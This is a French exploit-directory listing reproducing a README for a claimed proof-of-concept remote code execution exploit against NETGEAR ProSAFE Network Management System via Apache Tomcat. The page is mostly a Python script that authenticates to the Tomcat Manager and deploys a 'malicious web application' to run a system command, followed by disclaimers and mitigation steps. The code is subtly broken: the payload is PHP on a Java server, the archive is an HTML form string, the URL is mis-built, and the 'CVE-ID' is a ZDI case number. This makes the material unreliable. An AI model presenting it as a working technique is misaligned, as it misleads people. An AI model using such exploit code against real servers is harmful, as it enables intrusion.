Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-5246 — Exploit de preuve de concept démontrant l'exécution de code à distance dans le système de gestion réseau NETGEAR ProSAFE via Apache Tomcat vulnérable, avec un script de déploiement Python et des conseils d'atténuation. | Kitploit
Outils/GitHubGitHub/abdurahmon3236/cve-2024-5246
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubabdurahmon3236/cve-2024-5246

CVE-2024-5246

Exploit de preuve de concept démontrant l'exécution de code à distance dans le système de gestion réseau NETGEAR ProSAFE via Apache Tomcat vulnérable, avec un script de déploiement Python et des conseils d'atténuation.

Voir le dépôt
2il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Preuve de Concept (PoC) pour l'Exécution de Code à Distance dans NETGEAR ProSAFE Network Management System

Ce dépôt contient un script de Preuve de Concept (PoC) démontrant une vulnérabilité d'Exécution de Code à Distance (RCE) dans NETGEAR ProSAFE Network Management System. La vulnérabilité est due à l'utilisation d'une version vulnérable d'Apache Tomcat dans le programme d'installation du produit. Ce problème permet à des attaquants authentifiés d'exécuter du code arbitraire sur les installations concernées.

Description de la Vulnérabilité

CVE-ID : ZDI-CAN-22868

Aperçu : NETGEAR ProSAFE Network Management System contient une vulnérabilité d'exécution de code à distance due à l'utilisation d'une version vulnérable d'Apache Tomcat. Un attaquant disposant d'une authentification peut exploiter cette vulnérabilité pour exécuter du code arbitraire sur le système concerné dans le contexte de SYSTEM.

Versions concernées :

  • Versions de NETGEAR ProSAFE Network Management System utilisant des versions vulnérables d'Apache Tomcat.

Authentification : Requis

Détails du PoC

Ce PoC montre comment un attaquant peut exploiter la vulnérabilité pour parvenir à une exécution de code à distance. Le défaut spécifique réside dans le programme d'installation du produit en raison de l'utilisation d'une version obsolète ou vulnérable d'Apache Tomcat.

Script PoC

Le script suivant illustre comment exploiter cette vulnérabilité RCE. Assurez-vous de disposer des autorisations appropriées avant d'exécuter ce PoC.

Important : Ce PoC est destiné à des fins éducatives uniquement et ne doit pas être utilisé pour des activités non autorisées ou malveillantes.

root@kitploit:~
import requests

# Configuration
target_url = "http://target-ip:port/manager/html"  # Changez ceci par l'URL du Manager Tomcat de la cible
username = "admin"  # Remplacez par le nom d'utilisateur valide
password = "password"  # Remplacez par le mot de passe valide

# La charge utile à exécuter sur le serveur distant
payload = """
<?php
    // Charge utile pour exécuter du code PHP arbitraire
    system('whoami');
?>
"""

# Chemin d'URL du Manager Tomcat pour déployer une nouvelle application web
deploy_url = f"{target_url}/deploy?path=/example&update=true"

# En-têtes pour l'authentification
headers = {
    "Content-Type": "application/x-www-form-urlencoded"
}

def exploit_rce(url, username, password, payload):
    """
    Exploite la vulnérabilité RCE en déployant une application web malveillante.

    Args:
        url (str): L'URL du Manager Tomcat.
        username (str): Le nom d'utilisateur du Manager Tomcat.
        password (str): Le mot de passe du Manager Tomcat.
        payload (str): La charge utile malveillante à exécuter.
    """
    try:
        # Créer une nouvelle application web avec la charge utile malveillante
        response = requests.post(
            url,
            headers=headers,
            data={
                "path": "/example",
                "war": f"<form method='post' enctype='multipart/form-data'><input type='file' name='file' value='{payload}'/></form>"
            },
            auth=(username, password)
        )
        
        # Afficher les détails de la réponse
        print("Code de statut :", response.status_code)
        print("Corps de la réponse :", response.text)
        
        if response.status_code == 200 and "Deployed application" in response.text:
            print("[+] Application web malveillante déployée avec succès.")
        else:
            print("[-] Échec du déploiement de l'application web malveillante.")
    except requests.RequestException as e:
        print(f"[-] Une erreur s'est produite : {e}")

if __name__ == "__main__":
    print(f"Exploitation de la vulnérabilité RCE à : {deploy_url}")
    exploit_rce(deploy_url, username, password, payload)

Explication

  1. Configuration : Définissez target_url sur l'URL du Manager Tomcat du système cible, et mettez à jour username et password avec des identifiants valides.
  2. Charge utile : La charge utile est un simple script PHP qui exécute une commande système pour démontrer l'exécution de code.
  3. Fonction d'exploitation : La fonction exploit_rce() envoie une requête POST pour déployer l'application web malveillante.
  4. Déploiement : Le script tente de déployer une nouvelle application web avec la charge utile malveillante et affiche le résultat.

Considérations importantes

  • Autorisations : Assurez-vous d'avoir une autorisation explicite pour tester cette vulnérabilité sur le système cible. Les tests non autorisés sont illégaux et contraires à l'éthique.
  • Environnement de test : Effectuez les tests dans un environnement contrôlé pour éviter d'impacter les systèmes de production.
  • Utilisation éthique : Utilisez ce PoC de manière responsable et uniquement dans des contextes autorisés.

Atténuation

Pour atténuer cette vulnérabilité, suivez les étapes suivantes :

  1. Mettre à jour Tomcat : Mettez à niveau vers une version d'Apache Tomcat qui a corrigé la vulnérabilité.
  2. Sécuriser l'accès : Assurez-vous que le Manager Tomcat et les autres interfaces sensibles sont sécurisées et accessibles uniquement aux utilisateurs autorisés.
  3. Revoir les configurations : Examinez et durcissez régulièrement la configuration des applications web et des serveurs.

En suivant ces étapes, vous pourrez traiter la vulnérabilité RCE dans NETGEAR ProSAFE Network Management System et améliorer la sécurité globale.


Ce README.md fournit une description détaillée et un script PoC pour la vulnérabilité RCE, incluant des instructions de configuration, des considérations et des conseils d'atténuation.

Télécharger l’outil